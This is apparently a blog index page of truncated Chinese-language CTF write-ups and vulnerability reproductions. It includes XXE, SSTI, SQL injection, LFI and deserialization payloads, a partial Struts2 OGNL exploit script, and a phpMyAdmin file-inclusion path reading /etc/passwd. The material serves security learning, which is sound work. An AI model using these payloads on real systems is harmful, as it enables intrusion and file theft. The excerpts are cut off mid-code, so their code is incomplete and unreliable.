Fake XML cookbook 直接改POST即可。注入一个恶意的外部实体，使用file协议，根据题目提示读取flag。 payload： ]> <user><username>&file;</username><password>456</password></user> True XML cookbook 和上一题一样的界面，再次输入上提的payload： 根据提示，感觉flag在/var/ww…

打开就是这种和工具人玩XXOO的游戏（嘿。。 我们代表的是X，正常无论怎么玩都赢不了。按下f12仔细观察代码： <tr> <form id="form_ul" method="POST" action="/move"></form> <input type="hidden" name="move" value="ul"> <td id="ul" onclick="$('#form_ul').submit()"> </td> </tr>

在/hint.php页的源代码有一个提示： HTTP头针对于IP经常考的是XFF(X-Forwarded-For)或者Client-IP，其中XFF是最常见的。 于是我们抓包测试一下qwq，添加XFF，输入{{1+1}}存在模板注入： 然后测试执行phpinfo()，成功~ 最后执行 {{system("cat /flag")}}命令…

【BackupFile】 到./index.php.bak这里可以看到源码：

在/index.php.swp里发现了源码: 首先看到这段： 如果要进后台，就需要写脚本爆破看哪个字符串的md5前六位是6d0bc1： import hashlib password = "0123456789" for o in password: for p in password: for q in password: for r in password: for s in passwo…

扫描得到/.git/目录，尝试用GitHack读取源码：flag.php： $y){ $$x = $y; } foreach($_GET as $x => $y){ $$x = $$y; } foreach($_GET as $x => $y){ if($_GET['flag'] === $x…

ssti主要为python的一些框架jinja2 mako tornado django。 模板注入测试顺序--是时候祭出这张图了： 首先到/flag.php这页进行测试： Twig {{7*'7'}} 输出49 Jinja {{7*'7'}}输出7777777测试证明是Twig： 参考了这篇文章： www.k0rz3n.com因为提示cookie，经…

<h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ die("Not now!"); } include($file); //next.php } else{ highlight_file…

一直对注入题很抗拒。。学到了新知识记录一下。打开是一个登录框 随便输入什么会提示wrong user! ctrl+U查看源代码，注意注释： MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5base32解密： c2VsZWN0IC…

【Cosmos 的博客】 给了提示，可能跟git源码泄露有关： 大茄子让我把 flag 藏在我的这个博客里。但我前前后后改了很多遍，还是觉得不满意。不过有大茄子告诉我的版本管理工具以及 GitHub，我改起来也挺方便的。 python GitHack.py http://cosmos.hgame.n3ko.…

# Emdee five for life 随机给一串字符，提交它md5加密后的字符串，考虑使用脚本，总会提示too slow！！，不慌，多跑几遍脚本就好了。 import requests import re import hashlib url = "http://docker.hackthebox.eu:32169/" s = requests.session() r = s.…

做题地址：https://www.hackthebox.eu 关于邀请码：首先来到/register注册账号告诉我邀请码丢失，提示我先进入/invite。 在/invite这里的源代码里有一个inviteapi.min.js，其中有一个makeInviteCode函数，根据名字可以猜到和邀请码有关。 然后我在/invite页…

简单学了下smarty模板注入。 www.jianshu.com 访问http://url/xff 很容易猜测出这个IP的值受XFF头控制。在请求头里添加X-Forwarded-For: {{7+7}}，发现存在模板注入。 Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令。 但是这道题使用不了，会报错…

【1】HTTP协议中有很多请求方法。其中HEAD方法和GET方法相同，不过服务器响应时不会返回消息体（响应中正文内容），只有消息头。这种方法可以用来获取请求中隐含的元信息，而不用传输实体本身，所以传输效率高，它可以用来检测链接或目录的有效性。 【2】HTT…

file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php $this->file = 'index.php'; } } } if (…

把关键函数（or/select/union等）给替换为空，可以利用双写绕过，其他都算常规操作。 1' union select 1,2,3# 1'%20ununionion%20seselectlect%201,2,3%23 1' union select 1,2,group_concat(schema_name)from information_schema.schemata# 1'%20uniunionon…

题目给的表单可以接收JSON格式的命令。比如{"cmd":"ls"} 接下来如果输入{"cmd":"cat index.php"}的话什么都不会返回。 这是因为后端中有匹配规则： <br/>'; } elseif (preg_match('/^.*(alias|bg|bind|…</br/>

python数学运算提交脚本题。 这里用了requests库爬取网页，re库提取所需要的地方然后循环1000次提交。 难点在于这道题需要延续上一次提交的内容。 中间还是挺曲折的，因为容器突然断掉访问不上等原因。。 最终自己写脚本如下，1005也就是防止意外发生，如果…

主页只有一句：flag在哪里呢？经测试存在/.git，可以利用githack读取源代码。 GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit "; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])…

WEB部分 【nani】 啥也没有，看源代码发现一句话/index.php?file=show.php。 访问show.php得到user.php，因为是file参数考虑是否有LFI。 ?file=php://filter/read=convert.base64-encode/resource=user.php得到user.php的源码： warn); } function __wakeup(…

这道题还是不太难的嘿qwq记录一哈： 仔细观察url的img的参数，复制下来，两遍base64，一遍hex可以得到明文。 同理，我们将参数改为?img=TmprMlJUWTBOalUzT0RKRk56QTJPRGN3&cmd=（一次hex两次base64），然后查看源代码，可以得到index的源码。

哈哈，打开给👵逗乐了。 查看源代码，发现check.php：

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "…

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑，通过二次编码即可绕过检查，造成远程文件包含漏洞。 payload: http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 可见…

漏洞名称：Tomcat任意文件上传漏洞 漏洞编号：CVE-2017-12615 漏洞影响：上传包含任意代码的文件，并被服务器执行。 影响平台：Windows 影响版本：Apache Tomcat 7.0.0 - 7.0.812017年9月19日，Apache Tomcat官方确认并修复了两个高危漏洞，漏洞CVE编号:CVE-…

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。 漏洞复现： 利用hackbar或bp发送数据包如下，即可成功执行id命令： POS…

import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/<path:shrine>') def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').r</path:shrine>…

<h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //u…

查看源代码，到payflag页面，这里有个提示： Flag need your 100000000 moneyattentionIf you want to buy the FLAG: You must be a student from CUIT!!! You must be answer the correct password!!! 查了下CUIT是阿根廷的意思，我把Accept-Language改成了…

在/action.php这里抓包可以发现有一个secr3t.php 打开之后进行代码审计： 首先我直接?file=flag.php了一下，页…